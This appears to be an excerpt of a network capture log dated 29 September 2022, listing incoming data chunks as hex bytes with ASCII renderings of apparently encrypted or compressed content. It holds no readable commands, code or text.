                                                                                                                                                    2022-09-29 12:59:04 UTC8126INData Raw: 64 ee b6 fd 9c ec fe 42 1f e2 03 0f 3c bc c5 20 6e 6c 96 f2 51 33 96 0c 05 d9 1b d1 52 30 a2 fb 50 df 39 a0 99 60 57 81 db 6d 8f 1c 15 b4 75 2e 43 01 00 c7 f4 15 d7 eb 76 f6 d4 e9 8c 1b af 4d 9e 74 35 35 f2 4a 3c 80 61 78 3d 0e 46 be 6c 9d 3b e4 48 ed b0 f1 2b d4 1b df bb 3f dd 17 7f 92 4f e6 c5 d6 c5 7d 4c d5 82 0e c1 90 0d 70 16 98 5a 9c 57 9a 3e b6 9e dd c5 ce 4e 1a ed a9 c4 6f dd b6 b9 1a a0 16 c1 19 fb 43 54 57 ed a6 80 3d c0 ae d8 d0 6d db 23 cb 68 78 2c ae 11 be 2d ec 9a 51 8a 8e 6a b7 85 b3 b0 ce 04 e2 29 75 02 c6 7f a0 2e d2 df 0e e1 3c f1 d7 35 8f bc 9b 00 4a 54 37 d2 5e 9c aa 7c e2 3b 09 90 ca d4 1d f3 f7 d1 8f c2 18 82 3b 3c ed 2a 0c 55 3f 0e 4a e1 39 be ae 16 af 43 01 0f 69 e2 13 51 98 d8 1c 37 90 23 34 78 5c c9 f7 42 40 7e 4d 0a b8 17 ee a6
                                                                                                                                                    Data Ascii: dB< nlQ3R0P9`Wmu.CvMt55J<ax=Fl;H+?O}LpZW>NoCTW=m#hx,-Qj)u.<5JT7^|;;<*U?J9CiQ7#4x\B@~M
                                                                                                                                                    2022-09-29 12:59:04 UTC8142INData Raw: 96 50 ec 12 2e f1 44 93 09 75 fa 62 11 6c 8f e4 02 38 5d 8d 5b 21 9b 04 57 9d 1e 47 2c d1 94 52 8c 5f 64 60 84 a8 c1 eb 98 c2 dc b9 a6 da c3 7f 97 52 8d 90 fa 5c 10 0d 80 21 0b c9 99 12 54 51 77 20 40 96 27 ef f8 7f 52 c5 6c ff 67 5e ac 17 b1 90 18 65 ec 2b 58 35 cb eb 62 6a 30 6b 06 de 90 86 71 d8 f3 57 ee ac e7 29 3d 3d 8c bf 38 0c 19 32 f0 1b 1a cc d4 24 fd 8b 77 e6 82 5c 64 ff c3 fe 94 c0 53 a3 e9 34 b6 2e 7f c6 c4 07 9a 1e 55 2b e7 4a 79 f8 4f 3b 39 ac a3 bf 0c 45 61 54 d2 0d eb 51 53 c3 ad f7 14 ab ea d0 1e 44 99 18 75 0f 82 3e e6 14 c7 27 d2 58 a3 ec 9d 2b f2 47 a2 85 07 70 81 5d cb 59 6f f6 67 f6 c0 64 b7 61 b9 ae d2 8f e5 29 1a 19 60 8b 81 2a a5 ae 50 24 7a 2f 46 f3 bc f6 a2 b5 a0 0b fe 5e 13 71 b3 06 0b 40 2d f8 a2 1c e2 31 33 17 30 87 69 48 d3
                                                                                                                                                    Data Ascii: P.Dubl8][!WG,R_d`R\!TQw @'Rlg^e+X5bj0kqW)==82$w\dS4.U+JyO;9EaTQSDu>'X+Gp]Yogda)`*P$z/F^q@-130iH
                                                                                                                                                    2022-09-29 12:59:04 UTC8158INData Raw: 44 c0 ba 63 04 0b 08 d9 af c1 ab e3 47 e2 07 3e 37 0e 37 e0 bd 9a dc ed 53 f0 b2 52 27 58 00 28 fb 2c 50 60 f7 57 fc 2f cc 64 b0 78 b9 43 85 28 4c 6d 08 ca 25 6b cd 2d 94 2f 7c 03 93 21 4a 12 36 74 17 b4 ef 8a 81 17 13 69 a3 a6 2e a3 0c c1 c6 c7 fa 94 bd 78 4f 33 0c a3 79 a0 38 d4 41 6f 95 b6 5f 12 90 e3 da be af d7 e4 67 a0 b6 d9 77 fd 88 17 f1 41 a9 a6 74 1d 53 20 b2 50 0a 83 ab ac 4e 08 af e6 6c d8 3d fb 5a 77 81 8a 96 b4 90 5d 95 fa ac d6 cc 01 54 d1 77 60 49 76 a1 04 0c db 1e 5c bd 4a 2e f1 9b 17 24 47 4b 90 c9 86 61 2f 4f 8d b6 d7 d3 23 c6 04 02 49 06 60 81 f3 2a 07 7c ad 7f 5f 2a 72 66 2a c0 0c eb 9e 7b b0 ba 7c 47 98 49 8b fe d0 7b 84 d8 44 7a 29 ed 8a 8f 7f 66 b3 1d 74 19 f7 ea 9d 09 46 01 b8 a9 ab 6c 23 b3 ea 12 03 56 fe ed 74 a2 d7 f5 c8 fc 4e
                                                                                                                                                    Data Ascii: DcG>77SR'X(,P`W/dxC(Lm%k-/|!J6ti.xO3y8Ao_gwAtS PNl=Zw]Tw`Iv\J.$GKa/O#I`*|_*rf*{|GI{Dz)ftFl#VtN
                                                                                                                                                    2022-09-29 12:59:04 UTC8174INData Raw: f3 41 d8 74 0b fa 57 23 45 e1 6b 8c 55 26 59 45 8b a2 9a 13 05 75 fd 2e d1 29 23 c2 b0 a7 de 9e f3 99 f2 e7 8d e1 7e 1f 50 41 9f e2 88 e4 19 5e 85 8f 53 5e 72 00 69 b3 e9 b2 7b 85 5f 1a ba 39 c9 54 c5 4a c1 0f c2 cc 26 85 8b 23 51 89 b5 32 a9 c9 fa 24 cc 0c 7f 33 e1 94 d8 e3 2e e5 f1 7e 2a db 61 bb b1 2b b7 e7 e5 d3 30 53 53 d1 ae 2f 19 a5 04 cf a5 fe 04 22 24 d1 84 a2 4f 28 ee 23 b2 e1 9e 0b b0 48 24 e9 79 74 3d 05 23 89 4b 71 58 27 92 db 07 96 a5 f3 39 bb 17 be e5 17 fe 15 96 b4 fd f2 bd 04 d5 f0 e0 bd 00 49 13 35 66 21 e9 e0 21 a6 01 1d 44 d9 9b d5 d6 34 98 d8 ff 98 e4 07 3f 63 08 61 26 9b e7 a5 57 a1 26 71 87 7c 0e b0 0d a7 8f 8e 5f bb 29 a7 58 68 bd 36 38 03 e7 24 22 14 bf c1 29 52 2b 7a bc 4a 1b 7d 4f e8 54 17 eb b1 76 5f 37 51 ec 16 e7 70 02 8f c7
                                                                                                                                                    Data Ascii: AtW#EkU&YEu.)#~PA^S^ri{_9TJ&#Q2$3.~*a+0SS/"$O(#H$yt=#KqX'9I5f!!D4?ca&W&q|_)Xh68$")R+zJ}OTv_7Qp
                                                                                                                                                    2022-09-29 12:59:04 UTC8183INData Raw: e5 a9 1b 7e 70 0b 88 c1 f2 70 b3 4c ce 75 d9 24 3e 4c 37 88 e1 56 22 de b1 a8 fb c1 a0 72 ed 1a 5d 52 cb 64 af 62 31 30 69 74 c8 8e 32 1e 6b 36 6f 92 e4 27 29 27 9a e7 e1 76 69 b3 ce ae 51 56 69 3c 67 f3 57 fa 38 dd 4d 26 c2 48 f9 59 73 08 6f 04 22 fe 4d d8 4c e9 2d 28 20 90 36 47 7f aa 95 6e 3d f3 4c ed 0e 9a 38 78 22 f1 e7 6c 16 c7 01 67 ff 29 1b 5f a7 76 cd 2c df 62 e0 f9 f4 0c 9e 16 d6 38 a4 f7 54 28 e0 37 3d 5a dd 31 20 74 08 8c fc 60 b2 dc bb 7e 98 44 80 f7 4c f7 bf 88 4e bd 71 7d e6 52 02 a9 2a 7e f0 b9 9b a2 9e 1b 6f 6d 4a 3b 73 4e 6f a1 ea 87 7e 53 92 d6 19 cd 3d 4c 1e 8c f8 f4 c6 14 40 a0 98 8f 50 82 70 2a 4f 02 b9 3d 7a e6 81 20 e0 21 db 81 33 53 5e ea f3 b8 df 56 59 dc a7 d6 c3 b1 5b d6 91 cf 64 e9 20 17 f0 36 ff ce 3f 32 73 56 25 cc fa dd 37
                                                                                                                                                    Data Ascii: ~ppLu$>L7V"r]Rdb10it2k6o')'viQVi<gW8M&HYso"ML-( 6Gn=L8x"lg)_v,b8T(7=Z1 t`~DLNq}R*~omJ;sNo~S=L@Pp*O=z !3S^VY[d 6?2sV%7
                                                                                                                                                    2022-09-29 12:59:04 UTC8199INData Raw: fa f3 94 ed d5 c8 fe 81 f4 3b 1e 3d 21 aa f8 73 8f b6 6a 7a 7f 36 71 1e 85 65 7e 86 c8 01 7e 6f 1f 21 97 87 08 f5 71 90 dd 82 1a 04 1d 00 00 e1 d3 29 f1 0f 01 6d 16 6d f2 19 94 b7 97 7a a0 37 e6 08 2e eb 50 06 d5 b3 7f 6a ed d9 38 98 3a 16 56 44 fc a8 22 10 8f 96 66 ce be ea 1b 81 6f 50 ab 86 a2 c4 ba 42 5c 76 bf 9e 97 de 81 df 7d a4 af 7e f2 de 0c 6d 7a b0 76 d3 b0 b5 bc 0e f5 20 a3 16 ef d6 2b 48 63 00 3c 94 d9 3c 76 66 34 14 1a 85 79 14 50 27 28 dd 2d 2f ba 54 49 c7 d3 27 00 fc 11 99 54 90 33 a3 95 45 c3 ec 95 7f f0 3f 4e 21 12 9f 68 34 a2 ca ff 92 2e da e3 48 85 a3 13 81 6f 2d 91 98 0b 68 67 66 20 41 dc 90 cd 29 da 53 f5 c4 a3 35 90 1a 95 e0 f4 2f 48 5c 9a ab 1f f1 0a 05 59 3c 5a 1e ef 3a 03 e2 a3 e5 aa ff 33 cd b5 ee 3b 8b ab 6c 03 9e 6e 78 61 7c c5
                                                                                                                                                    Data Ascii: ;=!sjz6qe~~o!q)mmz7.Pj8:VD"foPB\v}~mzv +Hc<<vf4yP'(-/TI'T3E?N!h4.Ho-hgf A)S5/H\Y<Z:3;lnxa|
                                                                                                                                                    2022-09-29 12:59:04 UTC8215INData Raw: 5d bf 46 86 a3 b1 06 b4 34 b3 e9 ec 47 f3 ce e0 07 7e 0b 0e 88 36 5d 8f f6 17 04 8a 55 0a c2 50 be 11 76 dc fe 8a 5c 1f 0e 97 7c b7 e0 54 ca 0d 8b 3e f4 8a 25 65 61 e5 2a d1 39 15 34 5e 3f eb 3e ef 6d 3f 47 86 b2 9a 16 8c c1 bd 6e 2d 3a 07 fe bc 89 b6 21 1b 0f 8e db ba 8d 60 79 39 18 f0 a1 51 7a 84 ab a0 6d 37 38 cb 49 3f ab 61 2a 6b e5 45 cb 7b 35 3f 7d 90 57 7a 89 2f a9 b0 8f ac 07 5e 8c 90 ff ac cb ea ce ab 49 be d1 0c 59 21 79 af 03 1b 36 15 7d 39 c3 d0 32 be 12 52 aa ca ff 42 8b 0a 78 3d 27 5b b5 9c df e0 9a af 96 5f 12 65 fb be 91 0e 8f a1 31 f6 f1 a1 f2 88 f2 9d f0 f1 76 57 d0 19 94 59 90 46 65 09 16 06 4d 28 94 2b c8 97 6f b1 75 00 5f cc 29 f5 a5 6a b6 aa a5 9c 65 9e 7b 84 40 ee e9 c6 bf 6a f6 b7 60 c9 52 34 cb 38 45 74 a5 b6 47 74 4a 35 c4 15 ed
                                                                                                                                                    Data Ascii: ]F4G~6]UPv\|T>%ea*94^?>m?Gn-:!`y9Qzm78I?a*kE{5?}Wz/^IY!y6}92RBx='[_e1vWYFeM(+ou_)je{@j`R48EtGtJ5
                                                                                                                                                    2022-09-29 12:59:04 UTC8231INData Raw: cf 8c 24 1b 15 18 33 f7 fc fe ce 8f fb 7e 57 f7 55 92 4e 02 3f 5d e0 f8 84 ba 58 8d df 87 24 6a 78 db fc 80 f5 5a 4b bd 88 2a f8 69 f3 17 03 85 09 f1 e2 53 6d 93 d1 48 8f c2 04 0e a5 04 44 22 ef 35 da 98 7b a7 25 6a 24 be e4 a6 ab ed 98 98 3e 17 d4 23 1c c6 23 5c b6 c4 84 e3 00 5f 7a 6e b9 43 77 3d f6 6e e8 58 4b 07 f0 34 18 dd 51 69 26 64 32 57 e5 34 8e 5f d7 1d 66 3a 77 f9 31 ac 38 81 6d 23 e2 c7 e6 99 e5 1f 5a 09 7d 8e 47 a2 dc 5c 2c ae e2 e3 96 03 d3 b7 de 11 79 12 b4 9a b6 02 a8 57 d1 8e ed b1 ce a8 cc 78 e8 89 23 13 77 36 03 c7 d5 50 3a b2 c8 aa e5 ec 2b 2b 6b 8c 72 fd aa 46 d7 f7 c5 3d 5f ed 36 19 f3 06 9e 4b 52 aa b6 05 df 92 aa a3 aa 0a ee d3 a4 ec 77 9c 57 59 54 fe 1c 12 c0 c2 c7 7d d7 2d 74 c7 ef f5 70 17 59 55 47 f3 99 47 56 ba 4c ee 25 60 ee
                                                                                                                                                    Data Ascii: $3~WUN?]X$jxZK*iSmHD"5{%j$>##\_znCw=nXK4Qi&d2W4_f:w18m#Z}G\,yWx#w6P:++krF=_6KRwWYT}-tpYUGGVL%`
                                                                                                                                                    2022-09-29 12:59:04 UTC8247INData Raw: fa b8 08 61 5f f4 37 3d 36 bd 31 56 00 8e 32 57 0d c5 da 19 e9 77 73 5f 5e bb 8b b7 da e9 05 48 b2 34 bd 15 3b a8 49 fc 08 39 45 6e e7 2c ae b9 87 8c 68 0e a1 2d 6e b9 e5 40 5f aa 4a e8 ab cb 66 1e 1c 1f f9 40 da 95 e2 05 69 a6 0b f5 9c 3c eb 94 b1 54 13 22 7c ec 44 af 75 d9 a0 c6 14 1b 27 f9 35 b7 4a cd e1 b6 da 0f 00 fe 3c 6f 21 80 e1 bc b1 62 80 95 ff 16 c7 f5 b3 29 78 c4 93 44 f6 24 85 64 79 a9 16 a5 79 a1 c8 03 1d e9 0c db ab 3c 12 d7 62 7e 5e 9e 8e 5a 5e b4 8c 84 b9 cc be e5 a3 6a a7 60 8b ee 1e e7 58 ff 4e 68 d8 85 ba 36 e1 88 66 aa 1c 3b 98 57 d7 54 2b d9 10 ba be ec 4c b2 18 00 df 8c d9 17 ca 69 2c 9d ea b7 d1 84 78 c2 47 8e f2 55 3b 0b 76 58 e8 b7 0a 51 96 68 e3 75 87 9b c7 7c db 59 47 d8 96 9f 92 21 3b fa 85 d7 6a 3f 88 6c f9 b4 ad 77 a9 11 0e
                                                                                                                                                    Data Ascii: a_7=61V2Wws_^H4;I9En,h-n@_Jf@i<T"|Du'5J<o!b)xD$dyy<b~^Z^j`XNh6f;WT+Li,xGU;vXQhu|YG!;j?lw
                                                                                                                                                    2022-09-29 12:59:04 UTC8263INData Raw: c1 76 34 d3 6c 4c 90 10 3b 0b c0 84 5f f8 72 0a c9 72 c1 67 8b bb f2 04 45 0e da ae 12 61 b3 d9 67 43 e3 26 de 91 cd 67 d5 e5 3f d2 d4 15 ce 5b b9 de 26 0a 97 3f 5d 0e 31 ce 61 d8 ba fc 6d ef 24 29 5d 80 e4 e6 02 22 b9 6d 07 7a 9f fb d8 3d 43 f4 4b ed 5a cf 7e a8 6a 05 d3 63 9e 37 73 ed 75 66 48 5f 7e 53 e4 ff 97 f0 a6 13 4a 14 e4 5e 10 dc e5 ec ce 9a 75 ff b6 1d 99 26 9b 85 4f 22 f8 9e 7c b6 49 75 8f 64 c3 92 a2 ec 9a 8a 8a 0b b3 dd 9c 1c c2 54 99 08 3e 5b f3 90 f6 f7 e6 d6 1e 6a f5 9f 83 66 d5 5e 97 1e 0a db f4 aa 03 e3 f3 d4 d0 d7 da cb 25 9d 38 29 a6 48 13 0d 0d 31 d1 44 d1 3e 3e 86 be 0b 41 61 5c 24 12 de d5 23 58 1a 2b e9 49 77 ac 95 11 c1 9f a7 43 3b f7 c9 68 a0 11 a9 c3 d3 65 ff bc e6 0f 8f 15 41 f6 1c 8c 7d ab 61 64 12 17 4a 2a b8 0c b9 5c fd 6c
                                                                                                                                                    Data Ascii: v4lL;_rrgEagC&g?[&?]1am$)]"mz=CKZ~jc7sufH_~SJ^u&O"|IudT>[jf^%8)H1D>>Aa\$#X+IwC;heA}adJ*\l
                                                                                                                                                    2022-09-29 12:59:04 UTC8279INData Raw: b5 e5 6c 85 b6 40 2d 49 3c 75 1d 74 a7 36 fc de 3f 83 1f 94 5f 10 e9 9b af 36 c8 94 64 32 8c 59 9e 8d 2e 00 42 d1 84 6d 03 57 13 77 82 21 5f 50 4b ac a2 5b 03 02 84 93 04 0a 29 13 59 29 24 dd 0b b1 fe ea 81 75 ae 3e 78 52 32 3f 2e 32 f5 c7 39 09 96 99 52 72 e1 bb 99 c3 1a 39 cc a4 a4 82 e7 da 62 ed 40 eb 98 ce a6 51 61 f7 9a 83 56 99 46 32 e0 a7 23 38 76 7c ed 82 7a 03 27 26 a7 ea 1f 7f 01 a8 98 a9 58 39 41 90 b2 67 27 bf b7 04 17 e0 ff ec ff 2a 22 ae 12 0f a2 56 56 c3 15 db 3c 7e ea 31 5c 8c 2b a4 9a d7 98 9a 49 3f 77 30 60 e1 dc 0f b7 78 17 1d 3a b8 3a bc 89 1f 76 c2 dd 98 8d d7 61 ed dc d7 aa 7c 7a 91 7e 36 91 82 f6 43 d3 56 d3 bd 1f 26 99 ee 87 cb 72 e4 f4 f9 1b 12 a2 64 f7 e8 d8 34 cc 93 cb 0d 06 08 b9 e4 43 f1 8a ec 37 bc c7 3b a1 d9 93 b7 af 3d 17
                                                                                                                                                    Data Ascii: l@-I<ut6?_6d2Y.BmWw!_PK[)Y)$u>xR2?.29Rr9b@QaVF2#8v|z'&X9Ag'*"VV<~1\+I?w0`x::va|z~6CV&rd4C7;=
                                                                                                                                                    2022-09-29 12:59:04 UTC8295INData Raw: 20 50 2d a0 18 b2 01 89 a6 d6 82 33 57 c6 2e 80 d4 72 46 d6 7e 87 c5 79 a0 30 84 c6 7e 04 7d 76 d9 a4 80 5d fc 6f 76 2a 04 3d ee 89 68 9f 34 6f d2 69 54 3c ff 72 7c 9a bf f1 ed 2c 9a 19 34 6f fc 09 91 41 fe a9 59 93 b9 ba 7c f2 2f 06 17 cb 23 3c 4f 43 26 78 45 2f d7 be 9c 92 9f 5f 15 e1 8e 0c b2 d1 de d3 9d 80 4e 70 74 48 d2 9b 9d ec bf f6 61 3c 78 47 42 8f f1 07 17 1d 31 0f 04 be e0 0b 51 f6 2d 17 bc 93 ba 40 b3 0e 42 a1 1a e8 d6 bb 5d 6b 07 a1 46 57 a7 9a a3 2b 0a 5d 0c 6b de 5a 96 87 e0 83 12 c1 76 32 71 4b 5b da d8 b8 da 7d 61 28 d7 90 2b ce dd 1e 2c ba 54 a8 4d 7b 30 c6 92 67 7d f2 50 f3 84 b8 84 4b 44 6f 99 9b 82 0b 89 2a 50 9c b8 37 ec b5 28 bc 47 07 b9 1e 7b 3a 3e 65 0d 4a 5a a7 60 cd fe c2 27 20 0e ea 90 b7 d6 65 e6 29 f4 21 3c b5 6c 8e 59 c1 2f
                                                                                                                                                    Data Ascii: P-3W.rF~y0~}v]ov*=h4oiT<r|,4oAY|/#<OC&xE/_NptHa<xGB1Q-@B]kFW+]kZv2qK[}a(+,TM{0g}PKDo*P7(G{:>eJZ`' e)!<lY/
                                                                                                                                                    2022-09-29 12:59:04 UTC8311INData Raw: e9 a9 d4 5b 7d 93 19 f5 51 ad dc f4 b7 91 79 19 4b c1 15 37 b9 5f 30 82 8f 6a 3f 73 45 34 e1 23 77 ce 14 8d 2c 8c 4b 00 77 39 f7 00 d7 71 f7 63 d9 54 87 e9 f2 b2 27 1d 91 59 e8 5c 59 7e 5d 0e 30 b6 a2 01 1a 3f 5c d8 2b 9b 56 46 6d c0 7d 16 1d 8f 4c e3 33 d0 d5 f9 fb 04 0d a8 c5 42 61 4c 5c 14 a8 d7 d7 bd e2 85 f0 8f a5 2f 77 15 07 aa 78 71 bf 4b 22 8c 68 3d 3b 49 0f 93 b3 1b 0e d5 d6 78 62 53 8c 02 9a ca e8 d0 0a a5 f5 cd 89 ae d0 74 b2 63 2b a6 b7 c9 f6 0c 0e c7 f9 34 a3 78 d6 c9 62 43 16 41 b5 4b 9f 94 e4 c4 af ba 41 15 17 55 ed 72 a2 92 ad 43 da 4d bc d8 60 d3 c0 66 df 6c 52 3d 4b b3 0d 51 d0 8d d6 24 2b 45 25 1c 0b cd 7f dc 97 82 c6 cb b0 a6 10 75 32 df 29 33 af a2 4b 4a 38 bd 4e f2 15 bb 08 bf c2 2d b7 03 45 bc 3a 39 3a 53 f7 37 af 95 59 7a ca f8 c8
                                                                                                                                                    Data Ascii: [}QyK7_0j?sE4#w,Kw9qcT'Y\Y~]0?\+VFm}L3BaL\/wxqK"h=;IxbStc+4xbCAKAUrCM`flR=KQ$+E%u2)3KJ8N-E:9:S7Yz
                                                                                                                                                    2022-09-29 12:59:04 UTC8327INData Raw: e4 6c 13 b6 dd 05 17 f9 d8 2d 47 35 e2 36 2c 77 82 fe 95 56 cb 6f 99 79 a9 49 39 88 60 9c f5 74 13 cc 5d c9 9e f4 f1 f9 3c 11 dd e1 bd be 30 54 66 37 c3 df 78 f9 3b d2 3f 47 a5 8e 75 95 9e fb e4 cb 5e ec a7 e3 fb 82 62 9f e4 fd e4 07 8b 33 5b e2 c3 f0 9a 27 b8 55 5b 2f c6 57 e3 1c 91 a3 0c e8 ef 3f 6f 31 3b fb 6a 4c 80 7b f3 24 22 6f f4 1a 83 60 81 cd b4 d5 c0 6f d0 f2 31 21 ae bc 94 9e 6c 94 1f 6a c1 e7 02 e5 ec 11 4d 7c fa 74 48 53 b7 01 86 57 ef 31 0e e5 52 29 f9 d2 7a cb c4 f8 3f f8 a3 d2 f2 aa 62 7b d0 8e dc d6 45 da bf b8 a3 8d 9c f6 3e 73 90 82 af 2a e2 0b 31 82 bc 43 75 3b d7 94 fe a0 18 bf de 00 e9 f8 54 f5 6e 4c 77 7e 09 4e f6 4c 3f d9 b2 fc 6e 5f 8a 04 9a 0e c6 9b a7 07 84 50 d7 51 64 38 cc 35 2d 69 fc c5 f3 be cb 05 a9 7e fc 3a 0f f5 65 8f d4
                                                                                                                                                    Data Ascii: l-G56,wVoyI9`t]<0Tf7x;?Gu^b3['U[/W?o1;jL{$"o`o1!ljM|tHSW1R)z?b{E>s*1Cu;TnLw~NL?n_PQd85-i~:e
                                                                                                                                                    2022-09-29 12:59:04 UTC8343INData Raw: f2 a8 63 84 94 4b d4 05 b1 e2 70 3a 2d e5 0e ef ad c7 cb fb 2a f7 3e 7b 7d f6 3b e0 f2 d8 df c4 7b b1 80 f6 4e 39 4e 32 d5 f4 3d b8 26 2b bd 0d 53 4e da 04 5b 73 70 30 f9 b9 03 20 99 1e db e4 96 9e a0 44 87 78 4f 06 48 3e c7 77 9c 3a bb 40 85 6b 40 f8 6b b7 80 4f f1 de d6 bf dc 03 93 3f e8 33 04 f9 c8 5d b1 43 40 a8 5a 3f 0f 73 8a 37 4d 4f eb 9a 37 b6 88 5c 03 d4 c3 ec fd d4 80 be 5d dd 25 11 6c 32 38 51 5d 39 3a 9c a8 5c 98 22 e1 07 78 63 ea c6 99 9c f1 1d 36 a4 8d 09 62 15 e6 3f f4 ef 4d c2 ca 97 0b 33 e2 f7 57 fc c0 6e e0 51 b4 58 6b 33 75 2d 95 c6 70 85 3a eb ef 83 15 01 91 d7 95 23 e1 30 84 6a a5 77 aa 29 d0 72 6f 68 13 c3 d8 60 ca 03 62 16 8e 1c 7c e2 04 77 61 42 ea aa ad 8c 5f 57 20 2d 5d 56 f6 b9 fa 98 30 a6 5f 5e b8 99 46 44 1d 85 2c a7 0c 30 c0
                                                                                                                                                    Data Ascii: cKp:-*>{};{N9N2=&+SN[sp0 DxOH>w:@k@kO?3]C@Z?s7MO7\]%l28Q]9:\"xc6b?M3WnQXk3u-p:#0jw)roh`b|waB_W -]V0_^FD,0
                                                                                                                                                    2022-09-29 12:59:04 UTC8359INData Raw: d6 b7 b1 3d f2 94 fc af 03 25 5a 4a 67 6a a7 b9 c6 2d 65 d0 a6 77 19 be 32 42 72 ed 35 c0 d1 5b c9 ab c7 01 6d 64 d3 e7 8f 57 ad d6 fe 9f e4 70 12 b8 0b 50 f7 00 80 d6 4a 8e bb fa f3 79 99 89 6f a3 98 f4 65 e5 4f e9 0c 4f 68 6f 79 c4 f1 19 77 e0 26 c7 82 9b 38 72 b4 99 45 34 58 b7 09 08 88 16 8c 07 ce c7 83 10 4b 6f 97 bd 2f 62 08 d2 cc 5b 3a a7 87 d2 0b 1f 96 08 5f 31 fb 5b a5 5c 08 2b bf 0b 7a 9f 3c 3c 9c d3 b0 9e 29 52 e3 60 7a 8d d2 bc ef 35 78 51 de a9 b9 72 91 12 3b 93 75 c0 67 72 20 a5 fd c9 a9 4d 5f 8a ce bd 8d 9c f6 40 39 58 ff 8d cc 5d 39 c1 a1 74 d1 e2 88 23 71 d1 f6 e0 87 09 fd e8 10 00 3f dd f8 c5 b2 ce c1 30 d8 bc 4b 67 63 0a ca 64 ce e7 50 ed dd c2 0d 30 76 80 ec d9 03 fb 93 9f da c8 ef f7 ab 41 16 4d 06 07 17 64 6e 82 17 0d 0a f7 41 89 5f
                                                                                                                                                    Data Ascii: =%ZJgj-ew2Br5[mdWpPJyoeOOhoyw&8rE4XKo/b[:_1[\+z<<)R`z5xQr;ugr M_@9X]9t#q?0KgcdP0vAMdnA_
                                                                                                                                                    2022-09-29 12:59:04 UTC8375INData Raw: e9 88 b2 71 d0 2e 31 2b 92 a5 df 11 b2 51 7c 5a 1c 1b 6a 03 b0 be b3 98 d0 b2 10 19 af 83 c1 32 91 e5 75 e2 48 22 9c b3 7e b3 bc ef 42 6c b1 58 d7 92 a9 c2 6f 97 d3 b8 3c c6 f2 83 c0 15 b4 c9 83 ae 1d e6 69 06 2e 4d 09 0c 5f 08 57 02 19 ad 81 cf 8e ee 22 d8 ec 03 a0 cc 07 67 c3 aa 82 c8 b1 ac 7d 7c 6d d1 c9 53 fb 11 d2 20 70 58 5b b7 8a e9 ad 57 a2 b3 7c 4a 01 4c ff 22 f0 5a 2f 3f 97 e9 02 0c 59 30 f5 db 3f d6 f0 ba 57 da f9 fe 6e 62 51 80 cb 9f 5d 78 72 49 3e ac 55 52 bc 04 c0 08 f6 c4 29 b7 98 77 1f ac 3a 2c 96 b1 a1 5e ba 64 8e fe db 9c e1 34 67 b5 6c 21 11 03 35 de bf f6 d7 d5 27 fe f7 cc 6a 7c 79 6c 86 e2 b2 cd f7 e7 23 e7 2d 66 27 2e 33 97 3a 20 9d ce f3 5d 15 c2 dc b9 fb c5 db 5f 0e 16 a8 44 67 e4 ac 62 e7 2d 5c a4 d4 8a 42 26 52 77 73 fd 21 94 00
                                                                                                                                                    Data Ascii: q.1+Q|Zj2uH"~BlXo<i.M_W"g}|mS pX[W|JL"Z/?Y0?WnbQ]xrI>UR)w:,^d4gl!5'j|yl#-f'.3: ]_Dgb-\B&Rws!
                                                                                                                                                    2022-09-29 12:59:04 UTC8391INData Raw: 1b 11 2b 25 67 b1 d2 6b e1 75 48 cf b3 7c b2 65 c7 c2 fd 12 3b 4c 9e 43 37 f0 ca 5d 69 ca c5 f3 05 25 d2 c9 3d d6 b1 08 d4 69 95 9a 93 99 0e 79 ae c1 ba ed 58 12 6d 6e a8 17 a7 7f 1a ed af 55 89 d1 95 56 3a 95 2b e8 a6 d3 98 40 ea 77 19 6b b7 e0 fe 7b c0 9f 91 60 af ed 2d f6 3b 97 3e 82 bd 61 37 7d 75 b9 49 fa f1 54 98 b1 24 72 b0 f8 a6 00 b1 ef a7 21 34 fc 13 46 e3 c2 ea 46 5d c2 05 38 01 13 e6 94 f4 5e 3f 6d 50 1f 99 96 b1 89 ca 7c c7 02 6d bf 39 18 bc 24 f2 44 c4 38 d1 16 ea 02 59 3b db 73 5e 2a cc 6b c5 44 b3 2e 3a f0 69 7e 27 ac 3f 4b 8c 8a d7 a7 d3 4d a8 87 97 eb 21 af 49 2d 5d 5b ae ce c7 81 f1 49 93 9f 24 2f 65 3b 98 20 10 f4 cd 94 01 ec f6 57 c9 34 8d 39 d5 b4 d2 20 50 fe c0 0e 5e 10 a0 8c 40 38 21 a5 c3 0f 27 c9 cf 07 8b 61 62 2e 35 04 b6 a6 05
                                                                                                                                                    Data Ascii: +%gkuH|e;LC7]i%=iyXmnUV:+@wk{`-;>a7}uIT$r!4FF]8^?mP|m9$D8Y;s^*kD.:i~'?KM!I-][I$/e; W49 P^@8!'ab.5
                                                                                                                                                    2022-09-29 12:59:04 UTC8407INData Raw: 11 76 93 2d 70 20 13 bd 42 50 37 d0 48 36 8b f3 9a de 3a 09 d4 3c a0 16 ae e5 24 32 e0 96 3e c7 46 23 c5 4e 67 7f 12 1b 41 06 1b 5f 58 0e a6 52 ef a7 3e 67 40 43 b1 7c 27 cb 27 ad 32 b3 a2 ee 4e e5 44 9d 9f ea d9 a2 d7 34 fe eb 0a 82 b4 7a c5 66 d3 99 25 60 ad 24 f7 dc 70 3e 63 c1 2a c8 c5 63 2e 1c 18 64 5a 53 ae 3b c1 6a 6b d5 b8 34 73 97 ea 0b c5 62 ec fe ab c2 c7 f6 cf 74 9e 1d c3 4f 09 cd 28 3d 72 8d eb 76 9c c3 90 d6 6a ad d9 48 33 44 16 dd 2d 5e c4 b9 b6 ba 64 d2 43 7a 73 33 fa 6b f8 96 af d0 0d 1c be bb 17 9f b8 30 86 30 52 28 6d a3 21 cf 32 6d 02 bc c6 3a da a1 07 59 2a 25 cb 4e d1 d9 76 e8 f6 d3 f6 c5 66 2c c4 d9 63 4f 62 24 fb 61 27 cb b2 2a f3 ab 84 d3 c2 73 a4 f0 54 21 4b e4 a6 e8 d7 d1 20 d9 fc e5 41 13 12 90 84 52 c1 7d 72 34 20 6e b1 d4 e6
                                                                                                                                                    Data Ascii: v-p BP7H6:<$2>F#NgA_XR>g@C|''2ND4zf%`$p>c*c.dZS;jk4sbtO(=rvjH3D-^dCzs3k00R(m!2m:Y*%Nvf,cOb$a'*sT!K AR}r4 n
